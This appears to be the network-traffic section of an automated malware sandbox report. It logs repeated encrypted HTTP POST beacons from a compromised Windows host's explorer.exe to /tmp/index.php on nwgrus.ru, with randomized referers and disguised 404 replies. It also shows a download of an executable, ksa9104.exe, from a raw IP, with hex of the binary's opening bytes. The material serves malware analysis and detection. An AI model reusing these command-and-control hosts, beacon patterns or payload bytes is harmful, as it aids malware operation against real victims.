Oct 12, 2024 22:29:13.772727013 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49859	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:13.987952948 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cktuxsueygng.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 202 Host: nwgrus.ru
Oct 12, 2024 22:29:13.987977982 CEST	202	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 28 2d ed ab Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[*k,vu(-EFYNkmKvNu0ht<VPM+xcTNo+%^c19v&Jl[_N
Oct 12, 2024 22:29:15.061553955 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:14 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49870	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:15.070422888 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dxcesnnxlrm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 356 Host: nwgrus.ru
Oct 12, 2024 22:29:15.070442915 CEST	356	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 5b 14 ca fb Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[+k,vu[\BX}J~iFS_:iGq;AzO"-#e <W%3wP}MA<-8*nEX\|wo{17
Oct 12, 2024 22:29:16.143505096 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:15 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50043	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:30:25.196594954 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rdmqecpndyox.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: nwgrus.ru
Oct 12, 2024 22:30:25.196616888 CEST	227	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 27 f9 a6 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu@'Igjwe0~\-`B-"iP[\M_bmj?Na1nq2{&W_n]AVkZ\|tt"l
Oct 12, 2024 22:30:26.260431051 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:30:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50044	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:30:31.925354004 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lqwauqujlltwos.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: nwgrus.ru
Oct 12, 2024 22:30:31.925384998 CEST	173	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 09 a0 ad Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vuEFR(T\|#1]zP.<?'X]S[n}~:C*q<O/
Oct 12, 2024 22:30:33.004900932 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:30:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50045	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:30:40.937889099 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uciyasnlqtuqe.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 292 Host: nwgrus.ru
Oct 12, 2024 22:30:40.937935114 CEST	292	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 26 b0 f1 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vuZ&i@Wx:wr]"6"k~la\yG?,J[Q#@DvPU4c\|2O=uF1vh\g%uUi]&iudN
Oct 12, 2024 22:30:42.007350922 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:30:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50046	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:30:51.742774963 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ansjcylnamd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 208 Host: nwgrus.ru
Oct 12, 2024 22:30:51.742810011 CEST	208	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 1e c8 93 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu~W_Q@Ri<x*0kfE2@0FU87BEST{W$s%HVT(0HZ
Oct 12, 2024 22:30:52.824522018 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:30:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50047	175.119.10.231	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:31:04.785314083 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xcmbohrajfpmnq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: nwgrus.ru
Oct 12, 2024 22:31:04.785346985 CEST	338	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 33 f3 ff Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vuK3L1qotp2-<kB(<I\0!#K?\MyX1\M`T}C(M[EVwdP==ccLa*^S
Oct 12, 2024 22:31:06.258120060 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:31:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50048	175.119.10.231	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:31:19.249269009 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://elwljkaryvt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229 Host: nwgrus.ru
Oct 12, 2024 22:31:19.249310017 CEST	229	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 2e c9 86 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu}.ncd~54O :9]VlT]]Z@^J.H}& mxQ3TGFDgAO6(S~r]
Oct 12, 2024 22:31:20.968141079 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:31:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50049	175.119.10.231	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:31:34.612454891 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ctivelvucvmgu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: nwgrus.ru
Oct 12, 2024 22:31:34.612473011 CEST	137	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 28 f9 85 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vug(bO2V_Z2>FJ/!\|_
Oct 12, 2024 22:31:36.113661051 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:31:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	50050	175.119.10.231	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:31:48.995564938 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://coulxlduqqt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: nwgrus.ru
Oct 12, 2024 22:31:48.995596886 CEST	261	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5e 5e e0 ea Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu^^zbes>&f6[cIJLNSvLHPe/,dhXe_,L1K`Z=)sDsV=_0X)Ot
Oct 12, 2024 22:31:50.445827961 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:31:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50051	175.119.10.231	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:32:03.964360952 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pohgsixvlqwy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 301 Host: nwgrus.ru
Oct 12, 2024 22:32:03.964402914 CEST	301	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 33 c6 9a Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu@3fExYT;$y<}-y.h)"djz0KW0QBHtQX?tk;U{'Wz<ULQIrxhr8*]
Oct 12, 2024 22:32:05.414036036 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:32:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49779	23.145.40.164	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 20:29:01 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-12 20:29:01 UTC	327	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 20:29:01 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Sat, 12 Oct 2024 20:00:02 GMT ETag: "3b400-6244d0c961390" Accept-Ranges: bytes Content-Length: 242688 Connection: close Content-Type: application/x-msdos-program
2024-10-12 20:29:01 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 e1 fc 79 dc 80 92 2a dc 80 92 2a dc 80 92 2a c2 d2 16 2a c7 80 92 2a c2 d2 07 2a cc 80 92 2a c2 d2 11 2a 96 80 92 2a fb 46 e9 2a d9 80 92 2a dc 80 93 2a b2 80 92 2a c2 d2 18 2a dd 80 92 2a c2 d2 06 2a dd 80 92 2a c2 d2 03 2a dd 80 92 2a 52 69 63 68 dc 80 92 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 7a af e0 64 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y*******F*******RichPELzd
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 91 13 00 00 83 c4 14 56 e8 7b 2d 00 00 40 59 83 f8 3c 76 38 56 e8 6e 2d 00 00 83 ee 3b 03 c6 6a 03 b9 5c aa 41 00 68 74 67 41 00 2b c8 51 50 e8 9c 2c 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4e 13 00 00 83 c4 14 eb 02 33 f6 68 70 67 41 00 53 57 e8 02 2c 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 2a 13 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 92 41 00 53 57 e8 dd 2b 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 05 13 00 00 83 c4 14 68 10 20 01 00 68 48 67 41 00 57 e8 50 2a 00 00 83 c4 0c eb 32 6a f4 ff 15 04 61 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac 92 41 00 ff 36 e8 b9 2c 00 00 59 50 ff 36 53 ff 15 00 61 41 00 5f 5e 5b c9 c3 6a 03 e8 95 2d 00 00 59 83 f8 01 74 15 6a 03 e8 88 Data Ascii: t3PPPPPV{-@Y<v8Vn-;j\AhtgA+QP,t3VVVVVN3hpgASW,tVVVVVE4ASW+tVVVVVh hHgAWP2jaA;t$tjEP4A6,YP6SaA_^[j-Ytj
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 5e 5b 85 c0 74 03 83 20 00 ff 01 c9 c3 8b ff 55 8b ec 83 ec 0c 53 33 db 56 57 39 1d 70 8f b1 02 75 05 e8 fe ea ff ff 68 04 01 00 00 be e8 aa 41 00 56 53 88 1d ec ab 41 00 ff 15 94 60 41 00 a1 60 8f b1 02 89 35 a4 a2 41 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 77 05 00 00 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 88 a2 41 00 89 35 8c a2 41 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 f0 ab 41 00 83 ec 0c 53 56 8b 35 44 61 41 00 57 33 db 33 ff 3b c3 75 2e ff Data Ascii: tBUME^[t US3VW9puhAVSA`A`5A;tE8uuUEPSS}E=?sJMsB;r6PwY;t)UEPWV}EHA5A3_^[UASV5DaAW33;u.
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 75 04 8d 45 04 89 85 f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 b5 e8 fd ff ff 8b 40 fc 6a 50 89 85 e4 fd ff ff 8d 85 d8 fc ff ff 6a 00 50 e8 65 e5 ff ff 8d 85 d8 fc ff ff 83 c4 0c 89 85 28 fd ff ff 8d 85 30 fd ff ff 6a 00 c7 85 d8 fc ff ff 15 00 00 40 89 b5 e4 fc ff ff 89 85 2c fd ff ff ff 15 d8 60 41 00 8d 85 28 fd ff ff 50 ff 15 d4 60 41 00 6a 03 e8 c9 ac ff ff cc 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 83 a7 ff ff 0f b6 45 0c 8b 4d f4 8a 55 14 84 54 01 1d 75 1e 83 7d 10 00 74 12 8b 4d f0 8b 89 c8 00 00 00 0f b7 04 41 23 45 10 eb 02 33 c0 85 c0 74 03 33 c0 40 80 Data Ascii: ffffffuE0@jPjPe(0j@,`A(P`AjUuMEMUTu}tMA#E3t3@
2024-10-12 20:29:01 UTC	8000	IN	Data Raw: f3 8c 62 71 d5 03 48 9a 65 02 a2 be 38 63 4a cd 4b 5a a0 64 dd b4 1c 1b 17 cc fa 9d db 7f fa cd c0 fd cb 94 41 3d d3 dd e6 45 97 57 6a a2 d3 23 87 5f 84 9d 6b 60 4f fc b8 56 3a 78 51 c3 bc 5e 59 94 7e 17 45 7d e1 26 14 2b d1 5e d8 06 65 39 9c 8b 51 1c 90 bd 03 85 24 6c 82 f6 9a f9 22 80 6f c8 32 0a 83 6f 9f 83 46 2e 6c b4 a3 6a 7b 72 99 b7 be 1e 54 4b 3f 75 74 af 07 05 68 18 83 14 71 f7 13 8e 52 56 c8 8c b4 46 a1 f8 cf 78 16 ae 7e 0c 67 a5 8f 57 d3 68 a3 9b d9 f5 65 46 dc d9 34 78 43 06 92 ea 5b 88 6d 3a de d5 51 01 25 97 e0 72 af eb 46 b4 ee 0c 02 1a 15 18 90 db e9 e0 05 96 cf a2 3d a4 f5 cd ba 14 55 34 57 f2 76 0b 72 75 99 91 fd b7 a8 15 9f a6 57 84 b9 08 14 a8 96 80 6a af ab e8 96 d4 a6 c0 b4 34 b4 d0 5f f3 d6 de d1 01 02 a3 be fa c3 b0 c8 f8 c6 e2 d0 Data Ascii: bqHe8cJKZdA=EWj#_k`OV:xQ^Y~E}&+^e9Q$l"o2oF.lj{rTK?uthqRVFx~gWheF4xC[m:Q%rF=U4WvruWj4_
